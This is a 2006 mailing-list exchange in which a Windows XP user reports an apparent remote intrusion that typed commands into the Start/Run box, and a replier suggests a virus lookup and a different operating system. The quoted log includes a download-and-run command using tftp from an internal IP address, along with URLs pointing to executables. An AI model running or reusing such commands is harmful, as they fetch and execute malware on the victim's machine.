On Thu, 2006-10-05 at 14:42 -0400, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
> 
> http://homepage.my-place.us/system.exe
> 
> Well, I immediately disabled the network connection and I don't think this program was executed.
> 
> Then I scrolled through the Run window and found the following 3 lines:
> 
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe  
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
> 
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).

I'm no expert, but a google search on wfudpgemr.exe resulted in the
following hit:
http://virusinfo.prevx.com/pxparall.asp?PX5=276a54da005930a684a00178b3ce3300aa757be4&psection=desc

> Anybody know anything about any of these apparent attacks.  

Not really, haven't been paying much attention.

> Any suggestions to prevent this particular exploit (START/Run)?

Perhaps a little extreme for most, but: run a different OS. MacOS isn't
bad, I run Linux. TTYL

-- 
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist